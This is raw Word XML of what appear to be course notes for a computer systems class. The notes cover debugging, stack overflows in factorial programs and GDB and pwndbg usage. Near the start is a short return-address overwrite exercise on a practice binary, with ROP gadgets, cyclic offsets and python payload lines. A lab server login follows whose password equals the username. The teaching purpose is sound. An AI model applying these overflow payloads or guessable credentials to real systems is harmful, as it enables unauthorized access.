            </w:r>
          </w:p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0x000000000040129c : sub rsp, 8 ; add rsp, 8 ; ret</w:t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0x0000000000401010 : test eax, eax ; je 0x401016 ; call rax</w:t>
            </w:r>
          </w:p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0x00000000004010e3 : test eax, eax ; je 0x4010f0 ; mov edi, 0x404040 ; jmp rax</w:t>
            </w:r>
          </w:p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0x0000000000401125 : test eax, eax ; je 0x401130 ; mov edi, 0x404040 ; jmp rax</w:t>
            </w:r>
          </w:p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0x000000000040100f : test rax, rax ; je 0x401016 ; call rax</w:t>
            </w:r>
          </w:p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Unique gadgets found: 78</w:t>
            </w:r>
          </w:p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$ cyclic 100 | ./ropme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Segmentation fault (core dumped)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ulimit -c unlimited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cyclic 100 &gt; input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pwndbg&gt; r &lt; input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*RAX  0x64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*RBX  0x401220 (__libc_csu_init) ◂— endbr64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*RCX  0x7ffff7ecffd2 (read+18) ◂— cmp rax, -0x1000 /* 'H=' */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*RDX  0x200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RDI  0x0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*RSI  0x7fffffffe330 ◂— 0x6161616261616161 ('aaaabaaa')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R8   0x0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*R9   0x7ffff7fe0d60 (_dl_fini) ◂— endbr64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*R10  0x400499 ◂— 0x6474730064616572 /* 'read' */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*R11  0x246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*R12  0x401090 (_start) ◂— endbr64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*R13  0x7fffffffe460 ◂— 0x1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R14  0x0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R15  0x0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*RBP  0x6161616a61616169 ('iaaajaaa')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*RSP  0x7fffffffe358 ◂— 0x6161616c6161616b ('kaaalaaa')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*RIP  0x4011a8 (func+36) ◂— ret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───────────────────[ DISASM / x86-64 / set emulate on ]────────────────────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► 0x4011a8 &lt;func+36&gt;    ret    &lt;0x6161616c6161616b&gt;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cyclic -l kaaalaaa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40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python3 -c 'print ("A"*40 + "\xa9\x11\x40\x00\x00\x00")' &gt; input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python3 -c 'print ("A"*39 + "\xa9\x11\x40\x00\x00\x00\x00\x00\x00")'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Style w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4vaux7bgbxor" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote server info 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ssh -p 2222  [Student ID]@122.38.251.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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if your student id is 12345678 then use the following id and password. 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ID : C12345678 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Password : C12345678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ssh -p 2222 C12345678@122.38.251.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Style w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ushco7bu3djk" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Handling datalab-handout compile error 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If you encounter the following error, you need to install 'gcc-multilib'</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">osboxes@osboxes:~/datalab-handout-updated$ make</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gcc -Wall -m32 -lm -o btest bits.c btest.c decl.c tests.c</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In file included from btest.c:16:</w:t>
            </w:r>
          </w:p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  <w:t xml:space="preserve">/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory</w:t>
            </w:r>
          </w:p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   27 | #include &lt;bits/libc-header-start.h&gt;</w:t>
            </w:r>
          </w:p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  <w:t xml:space="preserve">      |          ^~~~~~~~~~~~~~~~~~~~~~~~~~</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000272">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">compilation terminated.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000273">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In file included from decl.c:1:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000274">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000275">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">   27 | #include &lt;bits/libc-header-start.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000276">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">      |          ^~~~~~~~~~~~~~~~~~~~~~~~~~</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000277">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">compilation terminated.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000278">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In file included from /usr/lib/gcc/x86_64-linux-gnu/12/include/limits.h:203,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000279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from /usr/lib/gcc/x86_64-linux-gnu/12/include/syslimits.h:7,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027A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from /usr/lib/gcc/x86_64-linux-gnu/12/include/limits.h:34,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">                 from tests.c:3:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/include/limits.h:26:10: fatal error: bits/libc-header-start.h: No such file or directory</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">   26 | #include &lt;bits/libc-header-start.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">      |          ^~~~~~~~~~~~~~~~~~~~~~~~~~</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">compilation terminated.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000280">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">make: *** [Makefile:12: btest] Error 1</w:t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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vv73c021kcg9" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apt update 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To install 'gcc-multilib' on the 'Ubuntu VM guest image' I shared before, you'll need to update the apt repository.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0c0d0e"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo sed -i -re </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="0c0d0e"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'s/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="0c0d0e"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> /etc/apt/sources.list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c0d0e"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo apt-get update &amp;&amp; sudo apt-get dist-upgrade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(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https://askubuntu.com/questions/91815/how-to-install-software-or-upgrade-from-an-old-unsupported-release/91821#91821</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) 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Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_psdqjijpq31h" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc-multilib 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sudo apt install gcc-multilib</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ccht4tp6hvnd" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.11.10 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fact.c </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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fact(int n) {</w:t>
            </w:r>
          </w:p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if(n == 1)</w:t>
            </w:r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n;</w:t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else</w:t>
            </w:r>
          </w:p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 * fact(n-1);</w:t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 {</w:t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int n;</w:t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 (n=0; n&lt;20; n++)</w:t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printf("factorial of %d: \t %d\n" , n, fact(n));</w:t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gcc -m32 -O1 -fno-stack-protector -no-pie -fno-PIC -o fact fact.c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ulimit -c unlimited</w:t>
            </w:r>
          </w:p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 ulimit -a</w:t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core file size          (blocks, -c) unlimited</w:t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data seg size           (kbytes, -d) unlimited</w:t>
            </w:r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scheduling priority             (-e) 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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 size               (blocks, -f) unlimited</w:t>
            </w:r>
          </w:p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pending signals                 (-i) 62459</w:t>
            </w:r>
          </w:p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max locked memory       (kbytes, -l) 65536</w:t>
            </w:r>
          </w:p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max memory size         (kbytes, -m) unlimited</w:t>
            </w:r>
          </w:p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open files                      (-n) 1024</w:t>
            </w:r>
          </w:p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pipe size            (512 bytes, -p) 8</w:t>
            </w:r>
          </w:p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POSIX message queues     (bytes, -q) 819200</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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real-time priority              (-r) 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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stack size              (kbytes, -s) 8192</w:t>
            </w:r>
          </w:p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cpu time               (seconds, -t) unlimited</w:t>
            </w:r>
          </w:p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max user processes              (-u) 62459</w:t>
            </w:r>
          </w:p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virtual memory          (kbytes, -v) unlimited</w:t>
            </w:r>
          </w:p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file locks                      (-x) unlimited</w:t>
            </w:r>
          </w:p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cat /proc/3329366/maps</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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08048000-08049000 r--p 00000000 fd:00 4465334                            /home/nshc/moon/computer_system/07_debugging/test/fact</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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08049000-0804a000 r-xp 00001000 fd:00 4465334                            /home/nshc/moon/computer_system/07_debugging/test/fact</w:t>
            </w:r>
          </w:p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0804a000-0804b000 r--p 00002000 fd:00 4465334                            /home/nshc/moon/computer_system/07_debugging/test/fact</w:t>
            </w:r>
          </w:p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0804b000-0804c000 r--p 00002000 fd:00 4465334                            /home/nshc/moon/computer_system/07_debugging/test/fact</w:t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0804c000-0804d000 rw-p 00003000 fd:00 4465334                            /home/nshc/moon/computer_system/07_debugging/test/fact</w:t>
            </w:r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f7dc6000-f7ddf000 r--p 00000000 fd:00 6041625                            /usr/lib/i386-linux-gnu/libc-2.31.so</w:t>
            </w:r>
          </w:p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f7ddf000-f7f3a000 r-xp 00019000 fd:00 6041625                            /usr/lib/i386-linux-gnu/libc-2.31.so</w:t>
            </w:r>
          </w:p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f7f3a000-f7fae000 r--p 00174000 fd:00 6041625                            /usr/lib/i386-linux-gnu/libc-2.31.so</w:t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f7fae000-f7faf000 ---p 001e8000 fd:00 6041625                            /usr/lib/i386-linux-gnu/libc-2.31.so</w:t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f7faf000-f7fb1000 r--p 001e8000 fd:00 6041625                            /usr/lib/i386-linux-gnu/libc-2.31.so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f7fb1000-f7fb2000 rw-p 001ea000 fd:00 6041625                            /usr/lib/i386-linux-gnu/libc-2.31.so</w:t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f7fb2000-f7fb5000 rw-p 00000000 00:00 0</w:t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f7fca000-f7fcc000 rw-p 00000000 00:00 0</w:t>
            </w:r>
          </w:p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f7fcc000-f7fcf000 r--p 00000000 00:00 0                                  [vvar]</w:t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f7fcf000-f7fd1000 r-xp 00000000 00:00 0                                  [vdso]</w:t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f7fd1000-f7fd2000 r--p 00000000 fd:00 6041336                            /usr/lib/i386-linux-gnu/ld-2.31.so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f7fd2000-f7ff0000 r-xp 00001000 fd:00 6041336                            /usr/lib/i386-linux-gnu/ld-2.31.so</w:t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f7ff0000-f7ffb000 r--p 0001f000 fd:00 6041336                            /usr/lib/i386-linux-gnu/ld-2.31.so</w:t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f7ffc000-f7ffd000 r--p 0002a000 fd:00 6041336                            /usr/lib/i386-linux-gnu/ld-2.31.so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f7ffd000-f7ffe000 rw-p 0002b000 fd:00 6041336                            /usr/lib/i386-linux-gnu/ld-2.31.so</w:t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ff7fe000-ffffe000 rw-p 00000000 00:00 0                                  [stack]</w:t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command is deprecated in Pwndbg. Please use the GDB's built-in syntax for running shell commands instead: !cat &lt;args&gt;</w:t>
            </w:r>
          </w:p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vmmap</w:t>
            </w:r>
          </w:p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 valgrind ./fact</w:t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Memcheck, a memory error detector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Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.</w:t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Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info</w:t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Command: ./fact</w:t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</w:t>
            </w:r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Stack overflow in thread #1: can't grow stack to 0xfe004000</w:t>
            </w:r>
          </w:p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</w:t>
            </w:r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Process terminating with default action of signal 11 (SIGSEGV): dumping core</w:t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Access not within mapped region at address 0xFE004FF0</w:t>
            </w:r>
          </w:p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Stack overflow in thread #1: can't grow stack to 0xfe004000</w:t>
            </w:r>
          </w:p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  at 0x80491B4: fact (in /home/nshc/moon/computer_system/07_debugging/test/fact)</w:t>
            </w:r>
          </w:p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If you believe this happened as a result of a stack</w:t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overflow in your program's main thread (unlikely but</w:t>
            </w:r>
          </w:p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possible), you can try to increase the size of the</w:t>
            </w:r>
          </w:p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main thread stack using the --main-stacksize= flag.</w:t>
            </w:r>
          </w:p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The main thread stack size used in this run was 8388608.</w:t>
            </w:r>
          </w:p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Stack overflow in thread #1: can't grow stack to 0xfe004000</w:t>
            </w:r>
          </w:p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--3329933-- VALGRIND INTERNAL ERROR: Valgrind received a signal 11 (SIGSEGV) - exiting</w:t>
            </w:r>
          </w:p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--3329933-- si_code=1;  Faulting address: 0xFE004FF0;  sp: 0x829a7f20</w:t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valgrind: the 'impossible' happened:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Killed by fatal signal</w:t>
            </w:r>
          </w:p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host stacktrace:</w:t>
            </w:r>
          </w:p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==3329933==    at 0x580B5272: ??? (in /usr/lib/x86_64-linux-gnu/valgrind/memcheck-x86-linux)</w:t>
            </w:r>
          </w:p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sched status:</w:t>
            </w:r>
          </w:p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running_tid=1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Thread 1: status = VgTs_Runnable (lwpid 3329933)</w:t>
            </w:r>
          </w:p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Segmentation fault</w:t>
            </w:r>
          </w:p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long long int fact(int n) {</w:t>
            </w:r>
          </w:p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if(n == 0) return 1;</w:t>
            </w:r>
          </w:p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if(n == 1)</w:t>
            </w:r>
          </w:p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n;</w:t>
            </w:r>
          </w:p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else</w:t>
            </w:r>
          </w:p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 * fact(n-1);</w:t>
            </w:r>
          </w:p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 {</w:t>
            </w:r>
          </w:p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int n;</w:t>
            </w:r>
          </w:p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 (n=0; n&lt;20; n++)</w:t>
            </w:r>
          </w:p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printf("factorial of %d: \t %lld\n" , n, fact(n));</w:t>
            </w:r>
          </w:p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3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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sw38rmpvu3n6" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fact4.c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fact(int n) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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if(n == 1)</w:t>
            </w:r>
          </w:p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n;</w:t>
            </w:r>
          </w:p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else</w:t>
            </w:r>
          </w:p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return n * fact(n-1);</w:t>
            </w:r>
          </w:p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 {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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int n=4;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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printf("factorial of %d: \t %d\n" , n, fact(n));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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gcc -m32 -O1 -fno-stack-protector -no-pie -fno-PIC -o fact4 fact4.c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objdump --disassemble=fact ./fact4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Style w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ho3x4w8xullg" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GDB Cheat sheet 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https://darkdust.net/files/GDB%20Cheat%20Sheet.pdf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pwndbg&gt; x/20wx $esp</w:t>
            </w:r>
          </w:p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0xffffd4c0:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00000004</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xffffd584</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xffffd58c</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x08049221</w:t>
            </w:r>
          </w:p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0xffffd4d0:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x2aa8f2b0</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xffffd4f0</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00000000</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x2a88ded5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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0xffffd4e0:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x2aa5e000</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x2aa5e000</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00000000</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x2a88ded5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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0xffffd4f0:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00000001</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xffffd584</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xffffd58c</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xffffd514</w:t>
            </w:r>
          </w:p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0xffffd500:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x2aa5e000</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00000000</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0xffffd568</w:t>
              <w:tab/>
              <w:t xml:space="preserve">0x00000000</w:t>
            </w:r>
          </w:p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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rlqhp4ueun1y" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">core file related setting  </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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c0d0e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color w:val="0c0d0e"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">echo "core.%e.%p" &gt; /proc/sys/kernel/core_pattern</w:t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c0d0e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color w:val="0c0d0e"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
          </w:p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c0d0e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color w:val="0c0d0e"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo service apport stop</w:t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c0d0e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color w:val="0c0d0e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color w:val="0c0d0e"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ulimit -c unlimited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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changing stack size </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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c0d0e"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ulimit -s unlimited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compile option for stack size </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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c0d0e"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">gcc -Wl,--stack,4194304 -o program program.c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gdb ./fact core.fact.3291331</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xbcyotfx7x36" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conditional break </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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b if $ebx == 4</w:t>
            </w:r>
          </w:p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disp /20xw $esp</w:t>
            </w:r>
          </w:p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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h29dz819bxwu" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intel or AT&amp;T syntax  </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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pwndbg&gt; set disassembly-flavor att</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Style w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
